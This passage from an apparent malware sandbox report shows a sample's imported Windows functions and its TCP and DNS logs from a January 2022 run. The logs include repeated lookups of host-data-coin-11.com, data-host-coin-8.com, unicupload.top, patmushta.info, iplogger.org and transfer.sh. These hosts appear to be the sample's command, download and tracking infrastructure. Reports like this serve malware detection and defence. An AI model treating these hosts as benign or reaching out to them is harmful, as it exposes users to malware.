InitializeCriticalSectionAndSpinCount, OutputDebugStringA, WriteConsoleW, OutputDebugStringW, LoadLibraryW, MultiByteToWideChar, GetStringTypeA, GetStringTypeW, WideCharToMultiByte, LCMapStringA, LCMapStringW, GetLocaleInfoA, SetFilePointer, GetConsoleCP, FlushFileBuffers, SetStdHandle, GetConsoleOutputCP, CloseHandle, CreateFileA
                                            USER32.dllOemToCharA
                                            ADVAPI32.dllGetFileSecurityA

                                            Possible Origin

                                            Language of compilation systemCountry where language is spokenMap
                                            DutchNetherlands
                                            AssameseIndia

                                            Network Behavior

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Jan 14, 2022 20:29:10.022617102 CET4977680192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:10.040724993 CET80497768.209.70.0192.168.2.4
                                            Jan 14, 2022 20:29:10.040833950 CET4977680192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:10.040967941 CET4977680192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:10.040987968 CET4977680192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:10.061697960 CET80497768.209.70.0192.168.2.4
                                            Jan 14, 2022 20:29:10.161679983 CET80497768.209.70.0192.168.2.4
                                            Jan 14, 2022 20:29:10.163666010 CET4977680192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:10.164652109 CET4977680192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:10.181844950 CET80497768.209.70.0192.168.2.4
                                            Jan 14, 2022 20:29:10.491770983 CET4977780192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:10.509166956 CET80497778.209.70.0192.168.2.4
                                            Jan 14, 2022 20:29:10.509269953 CET4977780192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:10.509358883 CET4977780192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:10.510267019 CET4977780192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:10.526633024 CET80497778.209.70.0192.168.2.4
                                            Jan 14, 2022 20:29:10.527496099 CET80497778.209.70.0192.168.2.4
                                            Jan 14, 2022 20:29:10.633177996 CET80497778.209.70.0192.168.2.4
                                            Jan 14, 2022 20:29:10.634684086 CET4977780192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:10.634809971 CET4977780192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:10.652122974 CET80497778.209.70.0192.168.2.4
                                            Jan 14, 2022 20:29:10.660783052 CET4977880192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:10.678258896 CET80497788.209.70.0192.168.2.4
                                            Jan 14, 2022 20:29:10.678359985 CET4977880192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:10.678431034 CET4977880192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:10.678451061 CET4977880192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:10.695811987 CET80497788.209.70.0192.168.2.4
                                            Jan 14, 2022 20:29:10.800823927 CET80497788.209.70.0192.168.2.4
                                            Jan 14, 2022 20:29:10.800962925 CET4977880192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:10.805845976 CET4977880192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:10.823174953 CET80497788.209.70.0192.168.2.4
                                            Jan 14, 2022 20:29:10.835488081 CET4977980192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:10.852793932 CET80497798.209.70.0192.168.2.4
                                            Jan 14, 2022 20:29:10.855110884 CET4977980192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:10.855258942 CET4977980192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:10.859095097 CET4977980192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:10.872654915 CET80497798.209.70.0192.168.2.4
                                            Jan 14, 2022 20:29:10.876432896 CET80497798.209.70.0192.168.2.4
                                            Jan 14, 2022 20:29:10.971247911 CET80497798.209.70.0192.168.2.4
                                            Jan 14, 2022 20:29:10.971352100 CET4977980192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:10.971648932 CET4977980192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:10.988930941 CET80497798.209.70.0192.168.2.4
                                            Jan 14, 2022 20:29:11.003556013 CET4978080192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:11.020915031 CET80497808.209.70.0192.168.2.4
                                            Jan 14, 2022 20:29:11.021145105 CET4978080192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:11.021188974 CET4978080192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:11.021203041 CET4978080192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:11.038378000 CET80497808.209.70.0192.168.2.4
                                            Jan 14, 2022 20:29:11.152443886 CET80497808.209.70.0192.168.2.4
                                            Jan 14, 2022 20:29:11.153122902 CET4978080192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:11.153377056 CET4978080192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:11.170557022 CET80497808.209.70.0192.168.2.4
                                            Jan 14, 2022 20:29:11.184070110 CET4978180192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:11.202044010 CET80497818.209.70.0192.168.2.4
                                            Jan 14, 2022 20:29:11.202202082 CET4978180192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:11.202297926 CET4978180192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:11.202322960 CET4978180192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:11.219639063 CET80497818.209.70.0192.168.2.4
                                            Jan 14, 2022 20:29:11.323678970 CET80497818.209.70.0192.168.2.4
                                            Jan 14, 2022 20:29:11.324387074 CET4978180192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:11.324666977 CET4978180192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:11.331758976 CET4978280192.168.2.4185.186.142.166
                                            Jan 14, 2022 20:29:11.341969967 CET80497818.209.70.0192.168.2.4
                                            Jan 14, 2022 20:29:11.387983084 CET8049782185.186.142.166192.168.2.4
                                            Jan 14, 2022 20:29:11.900846004 CET4978280192.168.2.4185.186.142.166
                                            Jan 14, 2022 20:29:11.957149029 CET8049782185.186.142.166192.168.2.4
                                            Jan 14, 2022 20:29:12.463393927 CET4978280192.168.2.4185.186.142.166
                                            Jan 14, 2022 20:29:12.519540071 CET8049782185.186.142.166192.168.2.4
                                            Jan 14, 2022 20:29:12.870682001 CET4978380192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:12.887943983 CET80497838.209.70.0192.168.2.4
                                            Jan 14, 2022 20:29:12.889792919 CET4978380192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:12.889857054 CET4978380192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:12.889867067 CET4978380192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:12.907186985 CET80497838.209.70.0192.168.2.4
                                            Jan 14, 2022 20:29:13.008774042 CET80497838.209.70.0192.168.2.4
                                            Jan 14, 2022 20:29:13.008929968 CET4978380192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:13.009166956 CET4978380192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:13.026371956 CET80497838.209.70.0192.168.2.4
                                            Jan 14, 2022 20:29:13.307760000 CET4978480192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:13.325298071 CET80497848.209.70.0192.168.2.4
                                            Jan 14, 2022 20:29:13.326244116 CET4978480192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:13.326380014 CET4978480192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:13.326399088 CET4978480192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:13.343657017 CET80497848.209.70.0192.168.2.4
                                            Jan 14, 2022 20:29:13.444963932 CET80497848.209.70.0192.168.2.4
                                            Jan 14, 2022 20:29:13.447304010 CET4978480192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:13.456474066 CET4978480192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:13.473978043 CET80497848.209.70.0192.168.2.4
                                            Jan 14, 2022 20:29:13.490773916 CET4978580192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:13.508124113 CET80497858.209.70.0192.168.2.4
                                            Jan 14, 2022 20:29:13.508218050 CET4978580192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:13.508342028 CET4978580192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:13.568973064 CET80497858.209.70.0192.168.2.4
                                            Jan 14, 2022 20:29:13.609756947 CET80497858.209.70.0192.168.2.4
                                            Jan 14, 2022 20:29:13.609818935 CET80497858.209.70.0192.168.2.4
                                            Jan 14, 2022 20:29:13.609901905 CET80497858.209.70.0192.168.2.4
                                            Jan 14, 2022 20:29:13.609946012 CET80497858.209.70.0192.168.2.4
                                            Jan 14, 2022 20:29:13.609973907 CET4978580192.168.2.48.209.70.0
                                            Jan 14, 2022 20:29:13.609983921 CET80497858.209.70.0192.168.2.4
                                            Jan 14, 2022 20:29:13.610024929 CET80497858.209.70.0192.168.2.4

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                            Jan 14, 2022 20:29:09.717817068 CET192.168.2.48.8.8.80xc52Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:10.181456089 CET192.168.2.48.8.8.80x50b7Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:10.642838955 CET192.168.2.48.8.8.80xc074Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:10.815781116 CET192.168.2.48.8.8.80xdff0Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:10.981431007 CET192.168.2.48.8.8.80x1085Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:11.163989067 CET192.168.2.48.8.8.80xa4aaStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:12.559750080 CET192.168.2.48.8.8.80xa259Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:13.018269062 CET192.168.2.48.8.8.80x778eStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:13.470618010 CET192.168.2.48.8.8.80x833bStandard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:15.160757065 CET192.168.2.48.8.8.80x3a22Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:15.331547976 CET192.168.2.48.8.8.80xd7c9Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:15.498477936 CET192.168.2.48.8.8.80x4bcfStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:16.069087982 CET192.168.2.48.8.8.80xa142Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:16.254492044 CET192.168.2.48.8.8.80x4c77Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:16.430603027 CET192.168.2.48.8.8.80x81ebStandard query (0)unicupload.topA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:16.583122015 CET192.168.2.48.8.8.80xc787Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:16.754019022 CET192.168.2.48.8.8.80x40fbStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:16.923821926 CET192.168.2.48.8.8.80xca44Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:17.383294106 CET192.168.2.48.8.8.80x863Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:17.549067974 CET192.168.2.48.8.8.80x9726Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:19.420042992 CET192.168.2.48.8.8.80x96a6Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:19.596793890 CET192.168.2.48.8.8.80xe326Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:19.781554937 CET192.168.2.48.8.8.80x1a4eStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:20.140119076 CET192.168.2.48.8.8.80x4a7fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:23.354924917 CET192.168.2.48.8.8.80x10bcStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:23.519073963 CET192.168.2.48.8.8.80xadddStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:23.720685959 CET192.168.2.48.8.8.80x5f8eStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:23.898070097 CET192.168.2.48.8.8.80x1acdStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:25.476651907 CET192.168.2.48.8.8.80xf661Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:25.665709019 CET192.168.2.48.8.8.80x14c4Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:25.838196993 CET192.168.2.48.8.8.80xe7cbStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:35.077847004 CET192.168.2.48.8.8.80x9952Standard query (0)microsoft-com.mail.protection.outlook.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:37.770320892 CET192.168.2.48.8.8.80x3059Standard query (0)patmushta.infoA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:47.191591024 CET192.168.2.48.8.8.80x55eaStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:47.362592936 CET192.168.2.48.8.8.80x7678Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:47.820290089 CET192.168.2.48.8.8.80xcf52Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:48.001112938 CET192.168.2.48.8.8.80xbff0Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:48.171740055 CET192.168.2.48.8.8.80xa2f1Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:48.384460926 CET192.168.2.48.8.8.80x8df1Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:48.576780081 CET192.168.2.48.8.8.80x4328Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:48.759460926 CET192.168.2.48.8.8.80xfe2bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:48.955866098 CET192.168.2.48.8.8.80xd0Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:49.140610933 CET192.168.2.48.8.8.80x4039Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:49.306057930 CET192.168.2.48.8.8.80xa0aaStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:49.476068974 CET192.168.2.48.8.8.80xc6d3Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:49.657352924 CET192.168.2.48.8.8.80x8431Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:49.830569029 CET192.168.2.48.8.8.80x8d3dStandard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:53.056298018 CET192.168.2.48.8.8.80xee16Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:53.218890905 CET192.168.2.48.8.8.80xdf9Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:53.380956888 CET192.168.2.48.8.8.80xbc85Standard query (0)goo.suA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:53.825635910 CET192.168.2.48.8.8.80xc6edStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:54.002545118 CET192.168.2.48.8.8.80xafa7Standard query (0)transfer.shA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:54.220135927 CET192.168.2.48.8.8.80xce80Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:54.391541004 CET192.168.2.48.8.8.80x66dbStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:54.554003000 CET192.168.2.48.8.8.80x75acStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:54.713959932 CET192.168.2.48.8.8.80x81b7Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:54.879584074 CET192.168.2.48.8.8.80x3011Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:02.214329958 CET192.168.2.48.8.8.80x5c1aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:02.380536079 CET192.168.2.48.8.8.80xee93Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:04.107853889 CET192.168.2.48.8.8.80xa06fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:04.271703959 CET192.168.2.48.8.8.80xce9bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:04.445702076 CET192.168.2.48.8.8.80x87abStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:04.621660948 CET192.168.2.48.8.8.80x4535Standard query (0)transfer.shA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:11.996265888 CET192.168.2.48.8.8.80xcf0aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:12.182595968 CET192.168.2.48.8.8.80xbceaStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:12.377898932 CET192.168.2.48.8.8.80x475cStandard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:17.901901960 CET192.168.2.48.8.8.80xe8cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:18.180469036 CET192.168.2.48.8.8.80x2817Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:18.268348932 CET192.168.2.48.8.8.80xfb9dStandard query (0)patmushta.infoA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:18.416841030 CET192.168.2.48.8.8.80xe2ebStandard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:20.727615118 CET192.168.2.48.8.8.80xf1edStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:20.905186892 CET192.168.2.48.8.8.80x38f1Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:23.109894991 CET192.168.2.48.8.8.80xcf31Standard query (0)iplogger.orgA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:27.657519102 CET192.168.2.48.8.8.80x803bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:27.846710920 CET192.168.2.48.8.8.80x4d74Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:28.016140938 CET192.168.2.48.8.8.80xdb9bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:28.256848097 CET192.168.2.48.8.8.80xfaf7Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:28.459739923 CET192.168.2.48.8.8.80x78e4Standard query (0)transfer.shA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:28.469984055 CET192.168.2.48.8.8.80xcb6Standard query (0)iplogger.orgA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:31.864511967 CET192.168.2.48.8.8.80xa7ebStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:32.156472921 CET192.168.2.48.8.8.80xe5f1Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:32.393162012 CET192.168.2.48.8.8.80xcd5eStandard query (0)transfer.shA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:34.850267887 CET192.168.2.48.8.8.80xef5dStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:35.069546938 CET192.168.2.48.8.8.80xe884Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:35.279342890 CET192.168.2.48.8.8.80xd4eeStandard query (0)transfer.shA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:35.785237074 CET192.168.2.48.8.8.80x7bd0Standard query (0)microsoft-com.mail.protection.outlook.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:42.930880070 CET192.168.2.48.8.8.80x2726Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:44.214027882 CET192.168.2.48.8.8.80x3fe1Standard query (0)github.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:44.502847910 CET192.168.2.48.8.8.80xc3Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:48.241736889 CET192.168.2.48.8.8.80xee5aStandard query (0)transfer.shA (IP address)IN (0x0001)
                                            Jan 14, 2022 20:31:08.601046085 CET192.168.2.48.8.8.80x1b20Standard query (0)patmushta.infoA (IP address)IN (0x0001)

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                            Jan 14, 2022 20:29:10.019198895 CET8.8.8.8192.168.2.40xc52No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:10.490426064 CET8.8.8.8192.168.2.40x50b7No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:10.660072088 CET8.8.8.8192.168.2.40xc074No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:10.833611012 CET8.8.8.8192.168.2.40xdff0No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:11.001287937 CET8.8.8.8192.168.2.40x1085No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:11.183374882 CET8.8.8.8192.168.2.40xa4aaNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:12.869715929 CET8.8.8.8192.168.2.40xa259No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:13.305824041 CET8.8.8.8192.168.2.40x778eNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:13.490113020 CET8.8.8.8192.168.2.40x833bNo error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:15.180360079 CET8.8.8.8192.168.2.40x3a22No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:15.349201918 CET8.8.8.8192.168.2.40xd7c9No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:15.812786102 CET8.8.8.8192.168.2.40x4bcfNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:16.087862968 CET8.8.8.8192.168.2.40xa142No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:16.274111032 CET8.8.8.8192.168.2.40x4c77No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:16.533947945 CET8.8.8.8192.168.2.40x81ebNo error (0)unicupload.top54.38.220.85A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:16.602067947 CET8.8.8.8192.168.2.40xc787No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:16.773143053 CET8.8.8.8192.168.2.40x40fbNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:17.236701965 CET8.8.8.8192.168.2.40xca44No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:17.402679920 CET8.8.8.8192.168.2.40x863No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:17.859249115 CET8.8.8.8192.168.2.40x9726No error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:19.439167023 CET8.8.8.8192.168.2.40x96a6No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:19.616394997 CET8.8.8.8192.168.2.40xe326No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:19.801878929 CET8.8.8.8192.168.2.40x1a4eNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:20.159404039 CET8.8.8.8192.168.2.40x4a7fNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:23.372855902 CET8.8.8.8192.168.2.40x10bcNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:23.540100098 CET8.8.8.8192.168.2.40xadddNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:23.738399982 CET8.8.8.8192.168.2.40x5f8eNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:23.921998978 CET8.8.8.8192.168.2.40x1acdNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:23.921998978 CET8.8.8.8192.168.2.40x1acdNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:23.921998978 CET8.8.8.8192.168.2.40x1acdNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:23.921998978 CET8.8.8.8192.168.2.40x1acdNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:23.921998978 CET8.8.8.8192.168.2.40x1acdNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:25.495446920 CET8.8.8.8192.168.2.40xf661No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:25.683790922 CET8.8.8.8192.168.2.40x14c4No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:25.859040022 CET8.8.8.8192.168.2.40xe7cbNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:35.107043982 CET8.8.8.8192.168.2.40x9952No error (0)microsoft-com.mail.protection.outlook.com104.47.53.36A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:35.107043982 CET8.8.8.8192.168.2.40x9952No error (0)microsoft-com.mail.protection.outlook.com40.93.207.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:35.107043982 CET8.8.8.8192.168.2.40x9952No error (0)microsoft-com.mail.protection.outlook.com40.93.212.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:35.107043982 CET8.8.8.8192.168.2.40x9952No error (0)microsoft-com.mail.protection.outlook.com40.93.207.1A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:35.107043982 CET8.8.8.8192.168.2.40x9952No error (0)microsoft-com.mail.protection.outlook.com52.101.24.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:35.107043982 CET8.8.8.8192.168.2.40x9952No error (0)microsoft-com.mail.protection.outlook.com104.47.54.36A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:37.789823055 CET8.8.8.8192.168.2.40x3059No error (0)patmushta.info94.142.143.116A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:47.210695982 CET8.8.8.8192.168.2.40x55eaNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:47.657924891 CET8.8.8.8192.168.2.40x7678No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:47.839870930 CET8.8.8.8192.168.2.40xcf52No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
